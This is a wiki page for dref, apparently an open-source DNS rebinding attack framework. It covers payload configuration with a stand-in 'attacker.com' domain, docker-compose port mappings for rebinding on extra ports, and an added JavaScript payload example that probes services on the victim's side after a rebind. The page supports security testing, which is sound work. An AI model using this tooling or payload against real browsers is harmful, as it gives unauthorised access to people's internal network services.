
Using Payloads

alxk edited this page Jun 26, 2018 · 11 revisions

The configuration file

Payload configuration is currently defined in the dref-config.yml file located in the project's root directory.

The default configuration file looks like this:

general:
  domain: attacker.com
  address: 1.2.3.4

targets:
  - target: "demo"
    script: "web-discover"

The targets section of the configuration is a list of YAML "target" objects. Each one describes a payload that dref will deliver.

The target key is used internally for a couple of purposes, but mainly it is the subdomain (under general.domain) that delivers the payload.

The script key names the payload script that is delivered when a user visits the target subdomain. Payload scripts live in dref/scripts/src/payloads/; the value is the file name without its .js extension.

In plain English the configuration above says:

When a user visits demo.attacker.com deliver the payloads/web-discover.js script.

Changing the configuration file

Currently, the Docker environment has to be restarted for changes to dref-config.yml to take effect:

$ docker-compose down
$ docker-compose up -d

Payload configuration keys

| Key | Type | Description |
|---|---|---|
| target | String | Target subdomain that will deliver the initial payload. Must be a valid subdomain string. |
| script | String | Payload delivered by the target subdomain. Must be a JavaScript file located in dref/scripts/src/payloads/, given without the .js extension. |
| args | Object | Valid YAML sub-object containing arguments to be passed to the script. These arguments are exposed to the payload as globals under window.args. Omit the key if the payload takes no arguments. |
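The following is an added example of how a payload can consume the args object described above; it is not code from the dref project. The target name "router", the script name "probe-ports", the argument keys ports and path, and the function names loadArgs and buildTargets are all assumptions made for this example. The only thing taken from dref's own behaviour is that the YAML args object is exposed as window.args.

```javascript
// Added example, not part of dref. It assumes the following hypothetical
// entry in dref-config.yml (the target, script and args keys are invented
// for illustration):
//
//   targets:
//     - target: "router"
//       script: "probe-ports"
//       args:
//         ports: [80, 8080]
//         path: "/admin"
//
// dref exposes the args object to the payload as window.args. Everything
// below (defaults, validation, function names) is this example's own.

const DEFAULT_ARGS = { ports: [80], path: '/' };

// Merge window.args over the defaults and validate the result, so that a
// typo in the YAML fails loudly instead of silently probing the wrong thing.
function loadArgs(args) {
  const merged = Object.assign({}, DEFAULT_ARGS, args || {});
  if (!Array.isArray(merged.ports) || merged.ports.length === 0) {
    throw new Error('args.ports must be a non-empty list');
  }
  for (const p of merged.ports) {
    if (!Number.isInteger(p) || p < 1 || p > 65535) {
      throw new Error(`invalid port in args.ports: ${p}`);
    }
  }
  if (typeof merged.path !== 'string' || !merged.path.startsWith('/')) {
    throw new Error('args.path must be an absolute path string');
  }
  return merged;
}

// Build the URLs the payload will request once the rebinding has taken
// effect: same hostname the page was loaded from (so the browser treats
// the request as same-origin), one URL per configured port.
function buildTargets(hostname, args) {
  return args.ports.map((port) => `http://${hostname}:${port}${args.path}`);
}

// Browser entry point. Under Node (used for testing) window is undefined,
// so the functions above can be exercised without a browser.
if (typeof window !== 'undefined') {
  const args = loadArgs(window.args);
  const targets = buildTargets(window.location.hostname, args);
  targets.forEach((url) => {
    fetch(url)
      .then((r) => r.text())
      .then((body) => console.log(url, 'returned', body.length, 'bytes'))
      .catch((err) => console.log(url, 'failed:', err.message));
  });
}
```

Note that the payload keeps the hostname it was served from and only varies the port and path: after the DNS record has been rebound, that hostname resolves to the victim's address while the browser still considers it the attacker's origin, which is the whole point of the technique. Validating args up front is worthwhile because a malformed YAML value would otherwise surface only as a confusing failure inside the victim's browser, where the attacker has no console.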

Rebinding on other ports

By default dref allows you to rebind on the standard web ports 80, 8000, 8080 and 8888. This is controlled by the docker-compose port mapping for the api container in docker-compose.yml. The attacker's server has to listen on the same port as the service being targeted, because the browser's origin includes the port: a page loaded from target.attacker.com:4000 can only make same-origin requests to port 4000 once the name has been rebound.

To support DNS rebinding on an additional port, add a mapping from that port on the host to port 80 in the api container by editing docker-compose.yml, keeping the existing mappings so the default ports still work. For example, to support DNS rebinding on port 4000 the configuration would look like:

  api:
    image: node:9.11.1-alpine
    networks:
      - dref
    ports:
      # existing mappings for the default ports listed above
      - 0.0.0.0:80:80
      - 0.0.0.0:8000:80
      - 0.0.0.0:8080:80
      - 0.0.0.0:8888:80
      # new mapping: host port 4000 to port 80 in the api container
      - 0.0.0.0:4000:80

Restart the Docker environment (docker-compose down, then docker-compose up -d) for the new port mapping to take effect.